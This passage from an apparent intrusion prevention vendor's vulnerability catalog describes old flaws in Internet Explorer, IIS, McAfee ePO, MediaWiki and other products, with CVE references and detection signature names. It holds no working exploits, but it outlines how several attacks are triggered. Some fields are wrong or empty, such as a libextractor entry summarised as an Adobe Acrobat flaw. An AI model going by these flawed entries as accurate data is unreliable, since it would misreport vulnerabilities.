HTTP_SHS-Internet-Explorer-Content-Type-Buffer-Overflow

References:

CVE-2006-5162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5162

BID-19092
http://www.securityfocus.com/bid/19092

OSVDB-29129
http://www.osvdb.org/29129

HTTP-Internet-Explorer-CreateTextRange-Vulnerability

About this vulnerability:

Internet Explorer createTextRange vulnerability

Risk:

High

First detected in:

sgpkg-ips-62-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0

Type:

Malfunction

Description:

Microsoft Internet Explorer has a vulnerability in the handling of the createTextRange method. According to documentation, the checkbox, image and radio buttons of an INPUT element do not have the createTextRange method. However, if the method is used by an HTML page, Internet Explorer erroneously attempts to call the method. This may allow arbitrary remote code execution with the current user's privileges via a specially crafted HTML page.

Situation:

HTTP_Internet-Explorer-CreateTextRange-Vulnerability
HTTP_SS-Internet-Explorer-CreateTextRange-Vulnerability-3
HTTP_SS-Internet-Explorer-CreateTextRange-Vulnerability-2
File-Text_Internet-Explorer-CreateTextRange-Vulnerability
File-Text_Internet-Explorer-CreateTextRange-Vulnerability-2
File-Text_Internet-Explorer-CreateTextRange-Vulnerability-3

References:

CVE-2006-1359
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1359

BID-17196
http://www.securityfocus.com/bid/17196

OSVDB-24050
http://www.osvdb.org/24050

MS06-013
http://technet.microsoft.com/security/bulletin/MS06-013

HTTP-Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-80-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary non-privileged code execution on the victim's computer.

Situation:

HTTP_SS-Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption
File-Text_Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption

References:

CVE-2006-4777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4777

BID-19738
http://www.securityfocus.com/bid/19738

OSVDB-28842
http://www.osvdb.org/28842

MS06-067
http://technet.microsoft.com/security/bulletin/MS06-067

HTTP-Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-79-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in the handling of a reference to a certain COM object that is not an ActiveX component in Internet Explorer. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary code execution with the privileges of the currently logged in user.

Situation:

HTTP_Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption
File-Text_Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption

References:

CVE-2006-3638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3638

BID-19340
http://www.securityfocus.com/bid/19340

OSVDB-27852
http://www.osvdb.org/27852

MS06-042
http://technet.microsoft.com/security/bulletin/MS06-042

HTTP-Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability

About this vulnerability:

Internet Explorer MSOE.dll, CHTSKDIC.dll and IMSKDIC.dll object instantiation vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-77-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Internet Explorer suffers from a vulnerability where trying to instantiate msoe.dll, chtskdic.dll or imskdic.dll as an ActiveX control may corrupt system memory causing a denial of service or possibly executing arbitrary code.

Situation:

HTTP_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability
File-Text_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability

References:

CVE-2006-4193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4193

BID-19521
http://www.securityfocus.com/bid/19521

BID-19529
http://www.securityfocus.com/bid/19529

BID-19530
http://www.securityfocus.com/bid/19530

OSVDB-29345
http://www.osvdb.org/29345

OSVDB-29346
http://www.osvdb.org/29346

OSVDB-29347
http://www.osvdb.org/29347

HTTP-Internet-Explorer-Multiple-Com-Objects-System-Compromise

About this vulnerability:

Incorrect handling of CLSIDs that refer to non-ActiveX component COM objects

Risk:

High

First detected in:

sgpkg-ips-34-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0

Type:

Buffer Overflow

Description:

Microsoft Internet Explorer does not handle correctly references to CLSIDs that reference certain COM objects that are not ActiveX controls. The vulnerability can be triggered by viewing a malicious HTML page with Internet Explorer, and a successful exploit allows arbitrary code execution on the victims computer. This vulnerability covers also CVE-2005-2127 and CVE-2005-2831.

Situation:

HTTP_Internet-Explorer-Multiple-Com-Objects-System-Compromise
File-Text_Internet-Explorer-Multiple-Com-Objects-System-Compromise

References:

CVE-2005-1990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1990

BID-14511
http://www.securityfocus.com/bid/14511

MS05-038
http://technet.microsoft.com/security/bulletin/MS05-038

HTTP-Internet-Explorer-Nested-Object-Tag-Memory-Corruption

About this vulnerability:

Internet Explorer nested OBJECT tag handling vulnerability

Risk:

High

First detected in:

sgpkg-ips-65-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0

Type:

Malfunction

Description:

Microsoft Internet Explorer has a vulnerability in the handling of nested OBJECT tags. 32 nested OBJECT elements which do not result in the creation of valid objects cause memory corruption, which may allow the execution of arbitrary code with the currently logged in user's privileges. Victims need to be tricked into viewing a malicious HTML page to exploit this vulnerability.

Situation:

HTTP_Internet-Explorer-Nested-Object-Tag-Memory-Corruption
File-Text_Internet-Explorer-Nested-Object-Tag-Memory-Corruption

References:

CVE-2006-1992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1992

BID-17658
http://www.securityfocus.com/bid/17658

OSVDB-27475
http://www.osvdb.org/27475

MS06-021
http://technet.microsoft.com/security/bulletin/MS06-021

HTTP-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in the instantiation of certain COM objects in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-111-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in the instantiation of certain COM objects in Microsoft Internet Explorer. The vulnerability can be exploited remotely by persuading a user to visit a malicious web site with the vulnerable browser to execute arbitrary code under the context of the currently logged-in user.

Situation:

HTTP_SS-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation

References:

CVE-2007-0218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0218

BID-24372
http://www.securityfocus.com/bid/24372

OSVDB-35348
http://www.osvdb.org/35348

MS07-033
http://technet.microsoft.com/security/bulletin/MS07-033

HTTP-Internet-Information-Server-Help-Facility-Cross-Site-Scripting

About this vulnerability:

A cross site scripting vulnerability in Microsoft Internet Information Server

Risk:

Low

First detected in:

sgpkg-ips-92-1314

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

IIS 4.0; IIS 5.0; IIS 5.1

Type:

Cross-site Scripting

Description:

There is a cross site scripting vulnerability in Microsoft Internet Information Server. A crafted request made to the affected service may be used to forge search results or other information in the site.

References:

CVE-2002-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0074

BID-4483
http://www.securityfocus.com/bid/4483

OSVDB-3338
http://www.osvdb.org/3338

MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018

HTTP-Internet-Information-Server-Phone-Book-Service-BOF

About this vulnerability:

A buffer overflow vulnerability in Microsoft IIS Phone Book Service

Risk:

High

First detected in:

sgpkg-ips-254-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 4.0; IIS 5.0; IIS 5.1

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Internet Information Server Phone Book Service. A crafted request made to the affected service may be used to gain remote administrative access to the server

Situation:

HTTP_CSU-Microsoft-IIS-Malformed-Url
HTTP_CSU-IIS-Phone-Book-BOF

References:

CVE-2000-1089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1089

BID-2048
http://www.securityfocus.com/bid/2048

MS00-094
http://technet.microsoft.com/security/bulletin/MS00-094

HTTP-InterScan-VirusWall-Multiple-BOF

About this vulnerability:

InterScan VirusWall BOF

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1602-5242

Platform:

Windows NT

Software:

InterScan VirusWall

Type:

Buffer Overflow

Description:

The management interface of the Trend Micro InterScan VirusWall contains several buffer overflow vulnerabilities which could allow an attacker to gain access to the system.

References:

CVE-2001-0432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0432

BID-2808
http://www.securityfocus.com/bid/2808

HTTP-Ipc-At-Chip-ChipCfg-Cgi-Information-Disclosure

About this vulnerability:

ChipCfg script on IPC@CHIP discloses sensitive information

Risk:

Low

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

IPC@CHIP Embedded-Webserver

Type:

Insecure Configuration

Description:

IPC@CHIP has a cgi script ChipCfg.cgi installed by default, which can be exploited to disclose sensitive network information.

References:

CVE-2001-1341
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1341

BID-2767
http://www.securityfocus.com/bid/2767

HTTP-Ipswitch-WhatsUp-Maincfgret-Buffer-Overflow

About this vulnerability:

Buffer Overflow in Ipswitch WhatsUp Gold _maincfgret.cgi versions before 8.03 Hotfix 1

Risk:

Moderate

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Ipswitch WhatsUp Gold

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the _maincfgret.cgi script for Ipswitch WhatsUp Gold versions up to 8.03. A successful exploit allows remote attackers to execute arbitrary code via a long instancename parameter.

Situation:

HTTP_CRL-Ipswitch-WhatsUp-Maincfgret-Buffer-Overflow

References:

CVE-2004-0798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0798

BID-11109
http://www.securityfocus.com/bid/11109

OSVDB-9177
http://www.osvdb.org/9177

HTTP-Ipswitch-WhatsUp-Web-Interface-SQL-Injection

About this vulnerability:

Ipswitch WhatsUp Web Interface SQL Injection vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-64-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WhatsUp Professional

Type:

SQL Injection

Description:

Ipswitch WhatsUp Professional 2005 has an SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands by passing a malicious string as a value of the sUserName parameter in Login.asp.

Situation:

HTTP_CRL-Ipswitch-WhatsUp-Web-Interface-SQL-Injection
HTTP_CSU-Ipswitch-WhatsUp-Professional-SQL-Injection

References:

CVE-2005-1250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1250

BID-14039
http://www.securityfocus.com/bid/14039

OSVDB-17450
http://www.osvdb.org/17450

HTTP-IRIX-Webdist-RCE

About this vulnerability:

A vulnerability in webdist.cgi allows remote command execution

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

IRIX

Software:

<os>

Type:

Code Injection

Description:

A code injection vulnerability in webdist.cgi allows remote compromise if successfully exploited.

Situation:

HTTP_CSU-IRIX-Webdist-RCE

References:

CVE-1999-0039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0039

BID-374
http://www.securityfocus.com/bid/374

OSVDB-235
http://www.osvdb.org/235

HTTP-Isapi-Extension-Buffer-Overflow

About this vulnerability:

Buffer overflow in ISAPI Extension of MS Index Server and Indexing Service

Risk:

High

First detected in:

sgpkg-ips-7-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2

Software:

IIS 4.0; IIS 5.0

Type:

Buffer Overflow

Description:

Buffer overflow vulnerability exists in ISAPI Extension of Microsoft Index Server and Indexing Service. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim host. The Code Red worm exploits this vulnerability.

Situation:

HTTP_CRL-Code-Red-Worm-Attack
HTTP_CRL-Code-Red-II-Worm-Attack
HTTP_CRL-Isapi-Extension-Buffer-Overflow-Attack

References:

CVE-2001-0500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0500

BID-2880
http://www.securityfocus.com/bid/2880

OSVDB-568
http://www.osvdb.org/568

MS01-033
http://technet.microsoft.com/security/bulletin/MS01-033

HTTP-JamMail-Command-Execution

About this vulnerability:

Command execution vulnerability in JamMail

Risk:

Moderate

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

JamMail

Type:

Metacharacter

Description:

JamMail has a vulnerability in the parsing of user supplied data given to 'mail' parameter in the jammail.pl script. Remote attacker is able to exploit this vulnerability to execute arbitrary commands via shell metacharacters.

Situation:

HTTP_CSU-JamMail-Command-Execution

References:

CVE-2005-1959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1959

BID-13937
http://www.securityfocus.com/bid/13937

HTTP-Libextractor-Multiple-Heap-Buffer-Overflow-Vulnerabilities

About this vulnerability:

A vulnerability in Adobe Acrobat Reader allows cross site scripting

Risk:

Moderate

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libextractor

Type:

Buffer Overflow

Description:

There are multiple heap buffer overflow vulnerabilities in the GNU libextractor library. A malicious file can be used to trigger the vulnerability in specific file format plugins.

Situation:

HTTP_Libextractor-ASF-Heap-Buffer-Overflow
HTTP_Libextractor-Qt-Heap-Buffer-Overflow
File-MPEG_Libextractor-Qt-Heap-Buffer-Overflow
File-Binary_Libextractor-ASF-Heap-Buffer-Overflow

References:

CVE-2006-2458
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2458

BID-18021
http://www.securityfocus.com/bid/18021

HTTP-Lyris-Listmanager-Read-Attachment-SQL-Injection

About this vulnerability:

Lyris ListManager arbitrary SQL injection via numerical argument to read/attachment URL

Risk:

Moderate

First detected in:

sgpkg-ips-53-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lyris ListManager

Type:

SQL Injection

Description:

Lyris ListManager, an e-mail list managing software, contains SQL injection vulnerabilities. A HTTP request in the form of /read/attachment/<integer>;<sql code>;, where <integer> is any positive integer, allows remote attackers to execute arbitrary SQL commands on the Lyris database. No authentication is required to exploit the vulnerability. A successful attack allows attackers to read or modify application data and possibly to exploit vulnerabilities in the database that is used by the application.

Situation:

HTTP_CSU-Lyris-Listmanager-Read-Attachment-SQL-Injection

References:

CVE-2005-4143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4143

BID-15787
http://www.securityfocus.com/bid/15787

OSVDB-21548
http://www.osvdb.org/21548

HTTP-Machineinfo-Cgi-Information-Disclosure

About this vulnerability:

Machineinfo script gives hardware configuration

Risk:

Low

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

IRIX

Software:

SGI MachineInfo cgi script

Type:

Insecure Configuration

Description:

Some versions of IRIX install by default the machineinfo script. The script provides information about the host computer, such as type of processor, memory, etc. This could be helpful for remote attackers.

References:

CVE-1999-1067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1067

HTTP-Macromedia-JRun-4-Long-Url-Buffer-Overflow

About this vulnerability:

Macromedia JRun 4 web server long URL buffer overflow

Risk:

High

First detected in:

sgpkg-ips-83-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Macromedia JRun 4

Type:

Buffer Overflow

Description:

Macromedia JRun 4 Web server suffers from a buffer overflow vulnerability in the handling of long URLs. An URL of over 64k will overflow a buffer, and potentially allow remote attackers to execute arbitrary code on the vulnerable host.

Situation:

HTTP_CSU-Excessively-Long-Url

References:

CVE-2005-4472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4472

BID-16026
http://www.securityfocus.com/bid/16026

HTTP-Macromedia_JRun_Isapi_Filter_Get_Request_Buffer_Overrun

About this vulnerability:

Buffer overflow in Macromedia JRun/Coldfusion ISS ISAPI filter

Risk:

Moderate

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Macromedia JRun 4; ColdFusion

Type:

Input Validation

Description:

There is a buffer overflow vulnerability when handling long filenames within GET requests in the ISAPI filter for IIS server on Macromedia JRun and Coldfusion MX servers.

Situation:

HTTP_CSU-Macromedia-JRun-Isapi-Filter-Get-Request-Buffer-Overrun

References:

CVE-2002-1310
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1310

BID-6122
http://www.securityfocus.com/bid/6122

HTTP-MailEnable-Examine_And_Select_Commands_Buffer_Overflow

About this vulnerability:

Buffer overflow in mailbox name parameter SELECT command of MailEnable IMAP server

Risk:

Moderate

First detected in:

sgpkg-ips-107-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailEnable

Type:

Malfunction

Description:

Various versions of MailEnable's IMAP server contain buffer overflow condition.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Examine-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Select-Command

References:

CVE-2006-6290
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6290

BID-21362
http://www.securityfocus.com/bid/21362

HTTP-Mailfile-Cgi-File-Disclosure

About this vulnerability:

Arbitrary file disclosure vulnerability in mail-file

Risk:

Low

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oatmeal studio's Mail-File

Type:

Malfunction

Description:

Mailfile.cgi allows specified files to be e-mailed to user specified addresses via a Web interface. Due to improper parsing of arguments, any file readable by the Web server can be sent to any e-mail address. This allows remote attackers to read arbitrary files from the server.

Situation:

HTTP_CS-Mailfile-Cgi-File-Disclosure

References:

CVE-2000-0977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0977

BID-1807
http://www.securityfocus.com/bid/1807

HTTP-Mailman-Mmstdod-Cgi-System-Compromise

About this vulnerability:

Command execution vulnerability in Endymion MailMan Webmail

Risk:

High

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Endymion MailMan Webmail

Type:

Malfunction

Description:

The mmstdod.cgi belonging to Endymion MailMan Webmail makes an insecure call to open(). The vulnerability can be exploited by passing shell metacharacters into the alternate_templates parameter, and allows arbitrary commands to be executed on the web server.

Situation:

HTTP_CRL-Mailman-Mmstdod-Cgi-System-Compromise

References:

CVE-2001-0021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0021

BID-2063
http://www.securityfocus.com/bid/2063

HTTP-Mailpost-Debug-Information-Disclosure

About this vulnerability:

Mailpost displays system information when a debug parameter is used

Risk:

Low

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailPost

Type:

Malfunction

Description:

Mailpost version 5.1.1sv and possibly earlier contain an information disclosure vulnerability. By requesting mailpost.exe with a '*debug*' parameter, the script displays sensitive information about the server.

Situation:

HTTP_CSU-Mailpost-Debug-Information-Disclosure

References:

CVE-2004-1103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1103

BID-11595
http://www.securityfocus.com/bid/11595

HTTP-Mailstudio-Cgi-System-Compromise

About this vulnerability:

Mailstudio system compromise vulnerabilities

Risk:

High

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

HP-UX; Linux; Solaris

Software:

Mailstudio 2000

Type:

Malfunction

Description:

3R Soft's MailStudio 2000 suffers from two vulnerabilities. Maillist.cgi allows remote attackers to view any files readable by the web server because of a directory traversal vulnerability. Userreg.cgi allows commands to be executed as long as they do not contain spaces. Both vulnerabilities can be exploited by passing suitable arguments to the cgi files.

References:

CVE-2000-0526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0526

BID-1335
http://www.securityfocus.com/bid/1335

HTTP-Mambo-Globals-Php-MosConfig-Absolute-Path-Compromise

About this vulnerability:

Mambo Globals.php mosConfig_absolute_path variable command execution vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-47-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mambo Site Server; Joomla

Type:

Malfunction

Description:

Mambo Site Server versions 4.6 and earlier are vulnerable to remote command execution due to weak input validation. Remote attackers can supply a mosConfig_absolute_path variable containing the URL of a malicious PHP script to Mambo, causing the webserver to execute arbitrary commands. No user authentication is required to exploit the vulnerability. Includes CVE-2005-3738.

Situation:

HTTP_CSU-Mambo-Globals-Php-MosConfig-Absolute-Path-Compromise

References:

CVE-2008-2905
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2905

BID-15461
http://www.securityfocus.com/bid/15461

HTTP-Manpage-Lookup-Php-Buildmanpage-File-Disclosure

About this vulnerability:

Buildmanpage() in Manpage Lookup allows arbitrary files to be viewed.

Risk:

Low

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Manpage Lookup

Type:

Directory Traversal

Description:

The Buildmanpage() function in Manpage Lookup allows remote attackers to view arbitrary files from the host by passing the file name as an argument to 'command'.

References:

CVE-2004-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0071

BID-9395
http://www.securityfocus.com/bid/9395

HTTP-McAfee-ePO-HTTP-Server-Header-Processing-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the HTTP server component of McAfee ePolicy Orchestrator and ProtectionPilot

Risk:

High

First detected in:

sgpkg-ips-82-1314

Last changed:

sgpkg-ips-1589-5242

Platform:

Windows

Software:

McAfee ePolicy Orchestrator; McAfee ProtectionPilot

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in the handling of the AgentGuid and Source values in McAfee ePolicy Orchestrator and ProtectionPilot. A successful exploitation of this vulnerability leads to a DoS or arbitrary code execution with the privileges of the System user.

Situation:

HTTP_CS-McAfee-ePO-HTTP-Server-Header-Processing-Buffer-Overflow

References:

CVE-2006-5156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5156

BID-20288
http://www.securityfocus.com/bid/20288

OSVDB-29421
http://www.osvdb.org/29421

HTTP-McAfee-Epolicy-Orchestrator-DoS

About this vulnerability:

Denial-of-service vulnerability in McAfee's ePolicy Orchestrator

Risk:

Moderate

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee ePolicy Orchestrator

Type:

Malfunction

Description:

McAfee's ePolicy Orchestrator does not sufficiently check HTTP POST headers, allowing remote attackers to launch a denial-of-service attack by passing an invalid Content-Length value in a request.

Situation:

HTTP_CSH-McAfee-Epolicy-Orchestrator-DoS

References:

CVE-2004-0095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0095

BID-9476
http://www.securityfocus.com/bid/9476

OSVDB-3744
http://www.osvdb.org/3744

HTTP-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF

About this vulnerability:

Buffer overflow vulnerability in the McAfee ePolicy Orchestrator and Protection Pilot products

Risk:

Moderate

First detected in:

sgpkg-ips-101-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

McAfee ePolicy Orchestrator; McAfee ProtectionPilot

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the McAfee ePolicy Orchestrator and Protection Pilot products. When a crafted HTML page that contains a function call to the ExportSiteList method with a malicious string parameter is viewed with Internet Explorer by a target user who has a vulnerable product installed with the safe for scripting option enabled, arbitrary code can be executed with the user's privileges.

Situation:

HTTP_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF
File-Text_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF

References:

CVE-2007-1498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1498

BID-22952
http://www.securityfocus.com/bid/22952

HTTP-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog-BOF

About this vulnerability:

Buffer overflow vulnerability in the McAfee ePolicy Orchestrator and Protection Pilot products

Risk:

Moderate

First detected in:

sgpkg-ips-101-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

McAfee ePolicy Orchestrator; McAfee ProtectionPilot

Type:

Buffer Overflow

Description:

Situation:

HTTP_SS-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog-BOF
File-Text_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog

References:

CVE-2007-1498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1498

BID-22952
http://www.securityfocus.com/bid/22952

HTTP-McAfee-Subscription-Manager-ActiveX-Buffer-Overflow

About this vulnerability:

McAfee subscription manager library buffer overflow vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-77-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

McAfee Security Center

Type:

Buffer Overflow

Description:

McAfee subscription manager library installed with McAfee Security Center suffers from a buffer overflow vulnerability. The library is a COM object marked safe for scripting, allowing remote attackers to instantiate the COM object representing the library via an HTML page opened with Internet Explorer. Several functions in the library do not validate the length of input arguments before passing them forward, allowing malicious HTML pages to execute arbitrary code when opened with Internet Explorer on a system that has McAfee Security Center installed.

Situation:

HTTP_McAfee-Subscription-Manager-ActiveX-Buffer-Overflow
File-Text_McAfee-Subscription-Manager-ActiveX-Buffer-Overflow

References:

CVE-2006-3961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3961

BID-19265
http://www.securityfocus.com/bid/19265

OSVDB-27698
http://www.osvdb.org/27698

HTTP-Mdac-Buffer-Overflow

About this vulnerability:

Buffer Overflow in Microsoft Data Access Components (MS02-065)

Risk:

High

First detected in:

sgpkg-ips-16-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0; Microsoft SQL Server 2000; Microsoft SQL Server 7.0

Type:

Buffer Overflow

Description:

The Remote Data Services (RDS) component in Microsoft Data Access Components (MDAC) contains a buffer-overflow vulnerability that can be used to execute arbitrary code. Both web servers (IIS) and clients (Internet Explorer) using RDS are affected by this vulnerability.

Situation:

HTTP_CS-MSADCS-Content-Type-BOF

References:

CVE-2002-1142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1142

BID-6214
http://www.securityfocus.com/bid/6214

MS02-065
http://technet.microsoft.com/security/bulletin/MS02-065

HTTP-MediaWiki-Uselang-Php-Code-Execution

About this vulnerability:

MediaWiki arbitrary PHP code execution via uselang parameter

Risk:

Moderate

First detected in:

sgpkg-ips-64-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MediaWiki

Type:

Malfunction

Description:

MediaWiki does not filter input correctly, which leads to a PHP command execution vulnerability. The value of MediaWiki's uselang parameter is used in an eval() expression without sufficient sanitation, which allows remote attackers to execute arbitrary PHP commands via a crafted HTTP request.

Situation:

HTTP_CRL-MediaWiki-Uselang-Php-Code-Execution

References:

CVE-2005-4031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4031

BID-15703
http://www.securityfocus.com/bid/15703

HTTP-Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution

About this vulnerability:

Code execution vulnerability in Microsoft Access Snapshot Viewer

Risk:

Moderate

First detected in:

sgpkg-ips-158-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Access Snapshot Viewer

Type:

Malfunction

Description:

There is a code execution vulnerability in Microsoft Access Snapshot Viewer. By persuading a user to visit a malicious web site, a remote attacker can upload and execute arbitrary files on the victim's system.

Situation:

HTTP_SS-Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution
File-Text_Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution

References:

CVE-2008-2463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2463

BID-30114
http://www.securityfocus.com/bid/30114

OSVDB-46749
http://www.osvdb.org/46749

MS08-041
http://technet.microsoft.com/security/bulletin/MS08-041

HTTP-Microsoft-ASP.NET-Application-Folder-Information-Disclosure

About this vulnerability:

Information disclosure vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-73-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

There is an information disclosure vulnerability in Microsoft .NET Framework due to insufficient URL validition. A successful exploitation allows a remote attacker to gain unauthorized access to known files in the Application Code folder.

Situation:

